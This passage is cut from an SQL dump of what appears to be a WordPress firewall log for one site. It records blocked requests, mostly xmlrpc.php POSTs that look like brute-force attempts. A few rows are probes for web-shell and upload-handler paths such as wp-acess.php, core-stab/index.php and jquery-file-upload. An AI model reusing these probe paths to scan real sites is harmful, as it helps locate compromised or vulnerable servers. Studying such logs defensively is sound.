Chrome\\/70.0.3538.102 Safari\\/537.36\"}','HJTndaz8vQlmDEZoANOGre7S',0,1679395651.7898,1367,'','POST',403,0,515,0,1,'',0),('123.30.238.182',2065624758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','NtsHW96pvrCzR0SfZ7EB2Vid',0,1679395661.9710,1311,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','K1u47pbrRyhHZEsMG2CVcmJg',0,1679395662.0682,1305,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','O0YlyRL8g3WcKaxzhqwrT2po',0,1679395668.0218,559,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','tI8dsCxz7YM0go9rWPhkjAXL',0,1679395671.9495,688,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','hWamUpb8Z7GxSjflz6DstIFk',0,1679395690.9318,625,'','POST',403,0,515,0,1,'',0),('184.168.98.17',3098042897,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Krw7BzMvtnHh6DGSYJxjCeqg',0,1679404524.0242,618,'','POST',403,0,515,0,1,'',0),('88.99.191.164',1482932132,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','b2t6ZQa7exv8JfYcPmDAzN5i',0,1679404535.1623,1696,'','POST',403,0,515,0,1,'',0),('207.148.65.134',3482599814,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','9zb2MmtkVP7EKafps8B5QOLx',0,1679404539.3868,1395,'','POST',403,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','7NnO8qp2udmgWizSPo9xVXye',0,1679404539.5828,1364,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','gvpt6BzrJidmVsOSGI5MDfyQ',0,1679404546.9684,619,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','juifbLmI4ythoq26TnFOUwlX',0,1679404555.6044,551,'','POST',403,0,515,0,1,'',0),('43.135.100.126',730293374,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','ipr7IS9TXA5d1ynK6uZBev8h',0,1679404556.4944,563,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','cHYbF2UhgCn3lyVL6tB4ADxP',0,1679404590.3563,547,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','uRo5GB8q9X1yxnl7D0PAth6S',0,1679408816.5970,1828,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','lrcsn4f6hCqWiQpOKeIDGAZy',0,1679408830.2328,1014,'','POST',403,0,515,0,1,'',0),('68.178.224.133',1152573573,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','4VOG1JejBWAfUMnkuxgEQbo0',0,1679408830.8582,1424,'','POST',403,0,515,0,1,'',0),('65.21.78.116',1091915380,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Z0IH58tc4gukwFd3MzNAqCpJ',0,1679408837.6569,605,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','zegEW4MHQRmjLNS21PD3rBbp',0,1679408865.0832,2466,'','POST',403,0,515,0,1,'',0),('20.84.104.76',341076044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','OKLafkUE7osCv0bc8wjVFH5t',0,1679408866.6621,1783,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','903VLkeh81npwGuItMcrOZKf',0,1679408874.0676,583,'','POST',403,0,515,0,1,'',0),('167.114.98.248',2809291512,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','NRqtorsz2jvxQWIEUul5FXaL',0,1679408876.4156,585,'','POST',403,0,515,0,1,'',0),('43.135.100.126',730293374,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','zwunjTi1bMhUctyleDIA4k5N',0,1679408884.5627,1251,'','POST',403,0,515,0,1,'',0),('116.202.36.12',1959404556,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','tnLeFH4KRbCS5o3BuGx7EPdV',0,1679414799.0011,2084,'','POST',403,0,515,0,1,'',0),('184.168.119.63',3098048319,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','6zBfc9tvMiOg1qKN5oxGWpnZ',0,1679414798.0364,3716,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','gWSofM17K0dV3RJyeQGpshCO',0,1679414803.8376,540,'','POST',403,0,515,0,1,'',0),('167.114.98.248',2809291512,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','8he9Ob43pTNRlPU2dtJZSCuW',0,1679414810.7921,588,'','POST',403,0,515,0,1,'',0),('119.59.96.60',2000379964,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','pVOZEmAwqkt7hX4lvSGW59B0',0,1679414816.7441,1041,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','4zCuVcpNRrEQbnPaFgLOY7Av',0,1679414819.1307,539,'','POST',403,0,515,0,1,'',0),('64.20.33.2',1075060994,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','nD0RA42VKvhmupTG1ML3lyNB',0,1679414826.3994,599,'','POST',403,0,515,0,1,'',0),('5.135.152.155',92772507,'','http://cmdev-site1.com/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','5k1nw0DjlRc8XfFdNJSmoA2e',0,1679418849.5942,1522,'','GET',403,0,700,0,1,'',0),('5.135.152.155',92772507,'','http://cmdev-site1.com/wp-content/plugins/core-fork/index.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/537.37 (KHTML, like Gecko) Chrome\\/58.0.1145.75 Safari\\/537.37\",\"2\":\"cmdev-site1.com\"}','AcJNTnB0MvVwz96dCq8xSO53',0,1679418907.0307,1620,'','GET',403,0,700,0,1,'',0),('148.251.20.250',2499482874,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','qbKM9GtPDHj5y3T72Ffx8E1W',0,1679426271.4350,2778,'','POST',403,0,515,0,1,'',0),('184.168.101.66',3098043714,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','1yDJAbRuv9WnQaXdkGK04ZSU',0,1679426271.8882,2986,'','POST',403,0,515,0,1,'',0),('51.158.145.98',866029922,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','KMfU2HCSEb6p7VcFnh3IoGJg',0,1679426281.9668,564,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','IUfs4ntvqAXhEFmQW6Y5aybL',0,1679426285.6103,576,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','nMKcwa82Tmd1GEoi0gqLPrQh',0,1679426290.8589,572,'','POST',403,0,515,0,1,'',0),('184.168.119.63',3098048319,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','SEq8vdMJukIhFCxtg1aW50oT',0,1679426293.6182,579,'','POST',403,0,515,0,1,'',0),('43.129.198.177',729925297,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','F1KSyE3ZXGU9VbxjTowIB5sz',0,1679426298.0810,639,'','POST',403,0,515,0,1,'',0),('45.64.25.22',759175446,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','BQ0qoYM7kaiPbUpvX9z48FIR',0,1679426341.2226,1891,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','pKVGxIhXtJk0mCin5fcdNP18',0,1679428242.5781,1595,'','POST',403,0,515,0,1,'',0),('103.147.241.45',1737748781,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','FOCXLwQZqD5AoMdhn6lIzutv',0,1679428240.4603,3799,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','K0oBCiENxwbdjf57kOVTz6Q4',0,1679428244.5504,763,'','POST',403,0,515,0,1,'',0),('41.72.149.125',692622717,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','fj2A17VBmuDPLn0Cdyg49TI5',0,1679428251.4495,618,'','POST',403,0,515,0,1,'',0),('66.113.188.151',1114750103,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','sSGL0aM2YmU47ChWNlFto3KO',0,1679428254.4956,559,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','teSB4IHh7vUorGK8qFEAywWf',0,1679428260.0404,552,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','YhswEM0frZU1HJ8iaRSgky37',0,1679428260.9598,569,'','POST',403,0,515,0,1,'',0),('104.225.237.131',1759636867,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','FkH36dBKSNCe7sg4ibP5fDGU',0,1679428264.8855,629,'','POST',403,0,515,0,1,'',0),('213.82.217.117',3578976629,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','9FK6RHcZnP8ies0S1A5maYMU',0,1679428270.6024,599,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','NIPB0gMRz6Y9VdoWrtAqbySj',0,1679428271.6918,590,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','7TlbkEfFrVipYeo1maGyMctN',0,1679428275.6878,543,'','POST',403,0,515,0,1,'',0),('194.113.235.169',3262245801,'','http://cmdev-site1.com/wp-acess.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-acess.php\"}','fR9Zlcvk7jbtoXmsqrIy8zAE',0,1679431167.6185,3460,'','GET',403,0,700,0,1,'',0),('194.38.23.196',3257276356,'','http://cmdev-site1.com/admin/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','KefqgND39Hl8TXpixbn5rvVk',0,1679431488.2243,280,'','GET',403,0,700,0,1,'',0),('150.60.232.16',2520573968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','1POyIDaY9Lxsh7jzJ08kfpqe',0,1679434272.7219,3728,'','POST',403,0,515,0,1,'',0),('43.129.198.177',729925297,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','CPIak6GUxy4qdVei2fMprHQR',0,1679434276.1036,793,'','POST',403,0,515,0,1,'',0),('150.60.232.16',2520573968,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','bXfhBmE93F0cIi61VOwgCvRj',0,1679434284.9585,613,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','oKzh05vJfqDSM2Pj4xYZGVQN',0,1679434288.3690,569,'','POST',403,0,515,0,1,'',0),('184.168.119.63',3098048319,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','UKjRCfAcYnMPL4z2Ik8iVv7E',0,1679434300.6148,611,'','POST',403,0,515,0,1,'',0),('207.148.65.134',3482599814,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','PXU3iDgpktsqjMCf4QRKc6BV',0,1679434304.3340,562,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','VDWf5CPe8jaobYZNvMJF3kOr',0,1679434306.5706,578,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','OG0WR1cUX2QqL5Yhlie7BnDr',0,1679434313.3036,552,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UrKaYpLZAc3Ci1I2OhfVS9eX',0,1679434317.5491,531,'','POST',403,0,515,0,1,'',0),('45.139.10.72',764086856,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','jUZNlImJyPaSsrcKVbgF3XG7',0,1679434318.4680,567,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','NmfeIBbZJRdq1rPWElY8vKT4',0,1679434326.2757,555,'','POST',403,0,515,0,1,'',0),('81.161.229.112',1369564528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','WT9bIuZ3SUqsrfK4HClcQhi1',0,1679438805.7587,750,'','POST',403,0,515,0,1,'',0),('81.161.229.112',1369564528,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','HmTMADP1s5wKa3oOuJE4hb2y',0,1679438806.9947,539,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','w3r1yqUVBciC9OgmFk0YDpZW',0,1679446081.3995,3687,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','6HbIwm7OrdksjZ2JBhgD4NTM',0,1679446082.2301,3730,'','POST',403,0,515,0,1,'',0),('135.181.136.149',2276821141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','fOxWQL8VHulhstIB3mTcJP4z',0,1679446085.4749,1248,'','POST',403,0,515,0,1,'',0),('39.97.98.38',660693542,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','DQK68jId2g9euXw7BGxpaJtS',0,1679446094.2206,630,'','POST',403,0,515,0,1,'',0),('31.31.198.27',522176027,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','OWU0EjlX1n8aQhZLNRCeJ9D2',0,1679446105.8110,577,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','5mPCwDeKbAcaItygr7JBiuM3',0,1679446106.6172,931,'','POST',403,0,515,0,1,'',0),('52.47.42.107',875506283,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','yO7UGT6HfbXlFIZ8SvPK2NxV',0,1679446107.2625,752,'','POST',403,0,515,0,1,'',0),('91.239.206.128',1542442624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','5Ggkhnxljr8uiXMqK6cNDvd2',0,1679446113.2440,596,'','POST',403,0,515,0,1,'',0),('20.112.210.115',342938227,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','LVq5BQEsYmrjbpNPwcdiZ6Af',0,1679446116.2153,579,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','nJIvAlBcmYgzuaQVdo10SEj6',0,1679446123.7989,591,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','XEeRw0dA84pIbZqKNWrP7G2n',0,1679448598.5870,1264,'','POST',403,0,515,0,1,'',0),('212.90.121.205',3562699213,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','Je3w4QsqlxKI8gASCb10ZHtF',0,1679448595.4554,4534,'','POST',403,0,515,0,1,'',0),('135.181.136.149',2276821141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','URAc7mJHLVMXZ1ns4T02gqhY',0,1679448604.3318,836,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','hqOPMI9rAxDibVlp2oLGK7gR',0,1679448608.2485,1240,'','POST',403,0,515,0,1,'',0),('185.182.57.9',3115727113,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','bFHhWgLP0odARr6kB4lTECQy',0,1679448608.2733,1367,'','POST',403,0,515,0,1,'',0),('15.235.15.195',267063235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Y72NBlXSRO98a03u1UyEc5Fo',0,1679448615.2438,550,'','POST',403,0,515,0,1,'',0),('51.91.211.210',861656018,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','yi09lDBL23JUrnYGwbmtaudz',0,1679448620.2351,2537,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','z0fhQPuqCEvrNsRMSlnGAt2w',0,1679448620.6971,2264,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 